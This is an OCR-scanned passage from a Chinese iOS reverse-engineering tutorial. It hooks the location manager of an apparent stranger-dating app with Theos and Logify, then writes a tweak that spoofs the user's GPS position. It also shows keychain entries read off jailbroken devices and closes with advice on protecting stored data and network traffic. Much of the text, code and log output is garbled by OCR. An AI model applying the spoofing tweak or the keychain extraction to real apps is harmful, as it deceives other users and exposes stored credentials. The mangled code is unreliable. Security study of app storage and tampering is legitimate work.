-(void)locationManager:(id)manager didUpdateToLocation:(id)location fromLocation:(id)loca 
-(void)refreshLocationIfExceedLimit; 
-(void)HandleTimer ; 
-(void)updateServerLocation; 
-(void)locationFail; 
-(void)locationFinish; 
-(void)updateSelfLocation:(id)location; 
-(void)cancelLocation; 
-(void)reviseLocationToError:(id)error; 
-(void)reviseLocationToFail:(id)fail; 
-(void)reviseLocationToSuccess:(id)success; 
-(void)reviseLocationTo; 
-(void)stoplocation; 
-(void)locationTimeOut; 
-(void)starLocationAndCorrectLocation:(BOOL)location; 
-(id)getLatestLocationWwithInterval:(double)interval; 
-(void)dealloc; 
-(id)init; 
@end 





这 个 文件 很 有 意思 ， 很 可 能 就 是 我 们 要 找 的 。 
那 怎 么 确定 这 个 类 确实 是 我 们 想 要 的 呢 ? 


我 们 可 以 对 这 个 文件 的 所 有 方法 挂 钧 (编写 Tweak)， 先 打印 下 调用 记录 ， 并 分 析 其 参数 值 ， 最 
终 确定 是 不 是 这 个 类 。 


编写 Tweak 的 方法 参见 : Theos : iOS 越 狱 程 序 开 发 框架 


我 们 知道 ， 如 果 要 挂钩 某 个 方法 ， 类 似 如 下 代码 : 


#import <SpringBoard/SpringBoard.h> 
?$hook SpringBoard 


-(void)applicationDidFinishLaunching:(id)application { 
?60r 19g; 


UIAlertView *alert = [[UIAlertView alloc] initWithTitle:@"Welcome" 
message:Q"Welcome to your iOS Device Ted!" 

delegate:nil 

cancelButtonTitle:Q"security.ios-wiki.com" otherButtonTitles:nil]; 


[alert show]; 
[alert release]; 


j 


%end 


如 果 我 们 要 对 一 个 类 的 所 有 方法 ， 包 括 property 的 挂钩 《Hook)， 手 动 一 个 个 写 当 然 可 以 ， 但 
是 那 样 就 太 和 党 丈 了 。 下 一 节 我 们 介绍 一 个 工具 ， 可 以 一 下 就 对 整个 类 的 所 有 方法 挂钩。 


请 继续 阅读 下 一 节 。 


#8 修改 某 陌生 人 交友 软件 的 位 置信 息 下 的 更 多 文章 


简介 


Logify 能 够 接受 一 个 .h 关 文件 作为 输入 ， 然 后 输出 .xm 文 件 (MobileSubstrate 扩 展 ) » 3x 
个 .xm 文件 hook 这 个 类 的 所 有 方法 ， 当 这 些 方法 被 调用 的 时 候 打 印 log。 这 有 助 于 你 发 现 哪些 
方法 被 调用 了 。Logify 在 安装 了 Theos 之 后 就 有 。 


用 法 


在 命令 行 下 输入 类 似 的 命令 : 


/opt/theos/bin/logify.pl MomoLocationManager.h > tweak.xm 


其 中 MomoLocationManager.h 是 头 文件 ， 后 面 的 tWeak.xm 是 自动 生成 的 tweak 文 件 。 
在 我 的 mac 上 我 是 这 样 输入 的 : 


ZPs-MBP:momoLocation admin$ /opt/theos/bin/logify.pl MomoLocationManager.h > tweak.xm 


这 个 tweak.xm 的 内 容 如 下 : 


?hook MomoLocationManager 

- (void)setFakeLocation:(CLLocation* )fakeLocation { %log; %orig; } 

- (CLLocation* )fakeLocation { %log; CLLocation* r = %orig; NSLog(@" = 
- (void)setReviseLocation: (CLLocation* )reviseLocation { %log; %orig; } 


99", r); return r 


- (CLLocation* )reviseLocation { %log; CLLocation* r = %orig; NSLog(Q" = %@", r); return 


- (void)setLocation:(CLLocation* )location { %log; %orig; } 


- (CLLocation* )location { %log; CLLocation* r = %orig; NSLog(@" = %@", r); return r; } 


- (void)setLastLocTime: (NSDate* )lastLocTime { %log; %orig; } 
- (NSDate* )lastLocTime { %log; NSDate* r = %orig; NSLog(@" = %@", r); return r; } 
- (void)setLocManager:(CLLocationManager* )locManager { %log; %orig; } 


- (CLLocationManager* )locManager { %log; CLLocationManager* r = %orig; NSLog(@" = %@", 


- (void)setBeginDate:(NSDate* )beginDate { %log; %orig; } 
- (NSDate* )beginDate { %log; NSDate* r = %orig; NSLog(@" = %@", r); return r; } 
+(id)shareMomoLocationManager { %log; id r = %orig; NSLog(@" = %@", r); return r; 


-(id)distanceBetweenLocationDictionary:(id)dictionary { %log; id r = %orig; NSLog(@" = %@ 


-(BOOL)isOriginLocationValid { %log; BOOL r = %orig; NSLog(@" = %d", r); return r; } 
-(BOOL)isReviseLocationValid { %log; BOOL r = %orig; NSLog(@" = %d", r); return r; } 
-(void)locationManager:(id)manager didFailWithError:(id)error { %log; %orig; } 


-(void)locationManager:(id)manager didUpdateToLocation:(id)location fromLocation:(id)loca 


-(void)refreshLocationIfExceedLimit { %log; %orig; } 
-(void)HandleTimer { %log; %orig; } 
-(void)updateServerLocation { %log; %orig; } 
-(void)locationFail { %log; %orig; } 

-(void)locationFinish { %log; %orig; } 
-(void)updateSelfLocation:(id)location { %log; %orig; } 
-(void)cancelLocation { %log; %orig; } 
-(void)reviseLocationToError:(id)error { %log; %orig; } 
-(void)reviseLocationToFail:(id)fail { %log; %orig; } 
-(void)reviseLocationToSuccess:(id)success { %log; %orig; } 
-(void)reviseLocationTo { %log; %orig; } 
-(void)stoplocation { %log; %orig; } 

-(void)locationTimeOut { %log; %orig; } 
-(void)starLocationAndCorrectLocation: (BOOL)location { %log; %orig; } 


-(id)getLatestLocationwithInterval: (double)interval { %log; id r = %orig; NSLog(@" = %@", 


-(void)dealloc { %log; %orig; } 
-(id)init { %log; id r = %orig; NSLog(@" = %@", r); return r; } 
%end 


a] ea | 





使 用 Theos : iOS 4 I ER AE 2E 428 8] Zr iR 8 S Tweak? AGH Lit ^E dx 8 gtweak.xm& x 


自动 生成 的 tweak.xm 文 件 ， 然 后 安装 到 设备 上 。 


打开 Xcode 的 Organizer 看 设备 的 log。 可 以 得 到 如 下 的 log 信 息 : 
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at [17608] 
iat [17608] 
iat [17608] 
iat [17608] 
iat [17608] 
iat [17608] 
iat [17608] 
iat [17608] 
iat [17608] 
iat [17608] 


iat [17608] 
iat [17608] 


iat [17608] 


hat [17608] 
iat [17608] 
hat [17608] 
iat [17608] 


iat [17608] 
iat [17608] 
iat [17608] 
hat [17608] 
hat [17608] 
hat [17608] 
iat [17608] 
iat [17608] 
iat [17608] 
hat [17608] 
iat [17608] 





我 们 可 以 发 现 有 哪些 方法 被 调用 了 
我 的 经 纬度 


«Warning»: 
«Warning»: 
«Warning»: 
«Warning»: 
«Warning»: 
«Warning»: 
«Warning»: 


«Warning»: +[<MomoLocationManager: 
«Warninnxs..z.sMomoLocationManager: 
- [«MomoLocationManager: 
- [«MomoLocationManager: 
- [«MomoLocat ionManager: 
course -1.00) @ 05/04/14 


«Warning»: 
«Warning»: 
«Warning»: 


1 (speed -1.00 mps / 


«Warning»: 


«Warning»: 


1 (speed -1.00 mps / 


«Warning»: 


«Warning»: 
«Warning»: 
«Warning»: 
«Warning»: 


«Warning»: 
«Warning»: 
«Warning»: 
«Warning»: 
«Warning»: 
«Warning»: 
«Warning»: 
«Warning»: 
«Warning»: 
«Warning»: 
«Warning»: 











a EET PESE pe 0x1e151870> updateServerLocation] 
-[«MomoLocationManager: 0x1e151870» locationFinish] 
-[«MomoLocationManager: 0x1e151870» updateServerLocation] 
*[«MomoLocationManager: 0x81dd80» shareMomoLocationManager] 
- «MomoLocationManager: 0x1e151870» 
-[«MomoLocationManager: 0x1e151870» location] 


= «430.909808009, +120. 


- [«MomoLocationManager: 


- [«MomoLocationManager: 
course -1.00) @ 05/04/14 


*/- 65.00m (speed -1.00 mps / course -1.00) @ 05/04/14 17:44:20 GMT+08:00 
0x81dd80» shareMomoLocationManager] 
0x1e151870» 
0x1e151870» starLocationAndCorrectLocation:@] 
0x1e151870» setBeginDate:2014-05-04 09:44:31 +0000] 
0x1e151870» locationManager: «CLLocgtionManager: 0x1cd17a800» didUpdateToLocation:< 
17:44:31 GMT+08:00 frogLe B> +/- 65.00m (speed -1.00 mps 








0x1e151870> setLocatio /- 65.00m (speed -1.00 mps / course 


0x1e151870» locationManager:« 
17:44:32 GMT408:00 fromLocation:<+30 


ionManager: 0x1cd17a00» didUpdateToLocation:« 
p . 1120.00] 9- +/- 65.00m (speed -1.00 mps 


-[«MomoLocationManager: 0x1e151870» setLocation:«*30. aM, «120 qg- */- 65.00m (speed -1.00 mps / course 
-[«MomoLocationManager: 0x1e151870» stoplocation] 

-[«MomoLocationManager: 0x1e151870» location] 

= <+30. 90000099 +120. > */- 65.00m (speed -1.00 mps / course -1.00) @ 05/04/14 17:44:32 GMT«08:00 


-[«MomoLocationManager: 0x1e151870» 


-[«MomoLocationManager: 0x1e151870» 
-[«MomoLocationManager: 0x1e151870» 


z 1230 - ae SDa- +/- 
- [«MomoLoc ges e 0x1e151870» 
20 eR 


= «430.9 90908909,41 


| 0x1e151870» 
*120.G00600009» +/- 


= <+30 


=1 


-[«MomoLocationManager: 0x1e151870» 
-[«MomoLocationManager: 0x1e151870» 


120. 


setReviseLocation:<+30. ,*120.99 ^ +/- 65.00m (speed -1.00 mps / 
isOriginLocationValid] 

location] 

65.00m (speed -1.00 mps / course -1.00) @ 05/04/14 17:44:32 GMT«08:00 
location] 

65.00m (speed -1.00 mps / course -1.00) @ 05/04/14 17:44:32 GMT-«08:00 
location] 

65.00m (speed -1.00 mps / course -1.00) @ 05/04/14 17:44:32 GMT«08:00 


十 /一 


setLastLocTime:2014-05-04 09:44:34 +0000] 
updateServerLocation] 


*[«MomoLocationManager: 0x81dd80» shareMomoLocationManager] 


R3X LAR To 


其 中 红色 划 线 的 地 方 ， 就 是 我 们 的 当前 位 置 的 经 纬度 


这 个 图 中 ， 可 以 发 现 最 终 是 调用 了 : 


e (void)setLocation:(CLLocation* )location 


pe 


#8 修改 某 陌生 人 交友 软件 的 位 置 


8.3 12 M Logify3& £x z& Zi 78 M 


达到 目的 。 


Tv 


言 息 下 的 更 多 文章 


信 
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根据 上 一 节 的 分 析 : RRA E 9 Tweak FP he T : 


#import <CoreLocation/CoreLocation.h> 
?hook MomoLocationManager 


(void)setLocation:(CLLocation* )location { %log; CLLocation *locationi1 = [[CLLocation a 


%end 


| 


其 中 的 经 纬度 (39.91276257, 116.36980966)， 如 下 图 所 示 ， 是 我 随意 填写 的 。 





Google +39.91276257,+116.36980966 
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大 木 仓 胡同 37 号 
中 华人 民 共 和 国 北京 市 西城 区 邮政 编码 : 100010 
105 公 尺 西南 


路线 规划 ”搜寻 附近 地 区 MFE. 更 多 资讯 > 


I RUN -RA 
Google 地 图 -©2014 Google - 使 用 人 条款 - 闭 私 权 
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使 用 Theos : iOS 越 狱 程序 


最 终 的 效果 如 下 图 所 示 : 


8.4 编写 Tweak 并 安装 到 设备 上 238 


炸弹 斗 地 主 


te i F r 





成 功 把 当前 位 置 赫 换 。 


利用 本 系列 文章 介绍 的 工具 可 以 做 很 多 有 意思 的 事情 ， 欢 迎 读者 自己 去 找寻 目标 并 体验 这 些 
技术 。 


#8 修改 某 陌 生 人 交友 软件 的 位 置信 息 下 的 更 多 文章 


本 草 介 绍 了 编写 Tweak 的 实际 例子 。 从 头 文件 导出 、 使 用 Logify 跟 踪 函 数 调用 、 到 最 终 编 写 
Tweak， 介绍 了 如 何 伪装 自己 的 地 理 位 置信 息 。 


#8 修改 某 陌 生 人 交友 软件 的 位 置信 息 下 的 更 多 文章 


本 
地 
数 
HEF 
Qd 
m 
络 
iA jm 


在 5.2 AH, ZCE LER Ac AERE RAL ABBE £g HR EET TES DAT © 


NSUserDefaults，plist,sqlite3 等 等 ， 即 使 设备 不 越狱 ， 攻 击 也 能 够 提取 出 数据 。 在 设备 越狱 
之 后 ，keychain 中 的 数据 也 不 安全 。 


因此 ， 要 对 敏感 数据 加 密 ， 且 尽量 保存 到 keychain 中 (比如 token 信 息 ) 。 
下 面 是 2 个 例子 。 (密码 都 被 我 用 password 字 串 替 换 ) 


a) 家 里 的 WIFI 信息 


protection, class String AfterFirstUnlock 

mdat 4 Date Feb 26, 2013 5:31:54 AM 
acct String XXAXX 2BSSFS 

agrp String apple 

cdat Date Feb 26, 2013 5:31:54 AM 
data OD String . wifi password 

pdmn String ck 

SsVce String AirPort 


b) 茶 知 名 微 博 


protection class String WhenUnlocked 

mdat Date Feb 26, 2013 7:47:54 AM 
acct String XX XXX account.password 
agrp String JEBOWS37H2.XXX.XXX.XXX 
cdat Date Feb 26, 2013 7:47:54 AM 
data CD String * password 

pdmn String ak 


我 在 越狱 之 后 的 iDS 5.14% iPhone > iPad, iOS 6.1.2 的 ijPad 上 都 测试 过 ， 都 可 以 获得 如 上 信 
自 o 


AS 


实际 中 的 例子 远 不 止 这 2 个 。 很 多 应 用 都 是 直接 存 用 户 的 明文 密码 的 。 


个 人 如 何 防止 信息 泄露 

a) 修改 root 的 默认 密码 。 

b) 安装 能 信任 的 jail break app » 
对 开发 者 和 公司 


KBAR AP iA RAG o 
Encryption is a must for sensitive data ° 


考虑 到 用 户 的 安全 ， 这 里 并 没有 点 名 某 个 具体 的 应 用 ， 做 移动 App， 一 定 要 考虑 本 地 数据 存储 
的 安全 问题 。 


大 家 可 以 拿 感 兴趣 的 App， 用 本 系列 文章 介绍 的 方法 具体 分 析 一 下 。 
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HO 本 地 数据 和 网 络 通信 下 的 更 多 文章 


9.1 本 地 数据 分 析 243 


在 网 d 安装 和 用 法 和 6.1 分 析 HTTP/HTTPS 网 络 流量 这 两 节 ， 我 们 介绍 了 
对 iOS 的 网 络 通 信 进 行 分 析 的 方法 。 


利用 文 草 介 绍 的 方法 ， 可 以 发 现 有 以 下 几 类 : 

RIK BJ] SC 25 80 

有 的 应 用 一 点 也 不 注意 用 户 数据 的 安全 ， 竞 然 发 送 明 文 密码 。 读 者 可 以 拿 自 己 常 用 的 App 试 
试 ， 应 该 能 发 现 这 种 App， 我 发 现 我 第 用 的 一 个 电影 相关 App 竞 然 用 HTTP 直 接 发 送 用 户 的 明 
SCR RB o 

A iX BAZAN mdb 


ARABS Ro RARER Bao AL 3E 9885 87 md5 > md5 5I T xd AU? KAD 
实 都 相当 于 明文 了 。 现 在 甚至 有 公开 的 可 以 查询 md5 对 应 的 明文 的 网 站 。 


其 技术 原理 是 这 样 的 : 先 把 常用 的 各 种 明文 算 一 个 md5， 然 后 把 这 些 数 据 存 起 来 ， 最 后 更 具 
md5 来 倒 查 明文 。 
用 HTTPS 


有 的 应 用 以 为 用 HTTPS 就 安全 了 ， 所 以 就 直接 传输 明文 的 密码 ， 但 是 这 种 很 容 到 中 间 人 
攻击 ， 一 旦 通信 链 路 上 有 一 个 环节 出 了 问题 ， 冤 码 一 样 港 漏 。 


所 以 ， 如 果 用 HTTPS ， ee a 份 的 认证 ， 比 如 在 客户 端 保存 server 
证 书 的 相关 信息 ， 每 次 传输 之 前 ， 验 证 证 书信 息 ， 避 免 中 间 人 攻击 。 


用 HTTPS 传 输 md5 都 比 传输 明文 好 太 多 。 
和 目 定 义 协 议 


可 以 直接 建立 TCP 链 接 ， 然 后 利用 自 定 义 协议 ， 传 输 关 键 内 容 ， 比 如 用 户 名 密码 和 其 他 关键 
信息 。 


AN 


QQ 就 是 自 定义 协议 ， 登 录 和 聊天 信息 都 是 加 密 之 后 再 传输 。 


XMPP 


从 上 个 月 开始 , 很 多 XMPP 服 务 器 SUIS EN mZ o X& 14038 > VAWIXMPP Vr BUE H X 4 dy 
的 ， 比 如 GTalk， 比 如 MSN， 以 后 逐渐 XMPP 的 传输 也 会 加 密 。 


在 处 理 用 户 登 录 的 时 候 ， 请 不 要 传输 明文 的 冤 码 ， 而 且 请 注意 防止 重 放 攻 击 〈replay attack ， 
防止 重 放 攻 击 的 方法 就 是 使 用 nonce) 。 


EOEGCUE TX App 27 o iR AERE AERE AA PI SCE HIT Rdex ko SHAK 
兴趣 的 App 来 动手 分 析 下 。 


#9 本 地 数据 和 网 络 通信 下 的 更 多 文章 


简单 的 分 析 ， 可 以 发 现 ， 在 移 
fig xk d Ap RD E > 48% 


本 章 我 们 对 某 些 知名 应 用 的 本 地 存储 和 网 络 通信 的 安全 进行 
动 互 联网 ， 安 全 这 一 块 还 需要 大 家 更 有 安全 的 意识 ， 特 别 是 
让 我 们 尽量 避免 出 现 安全 上 的 问题 。 
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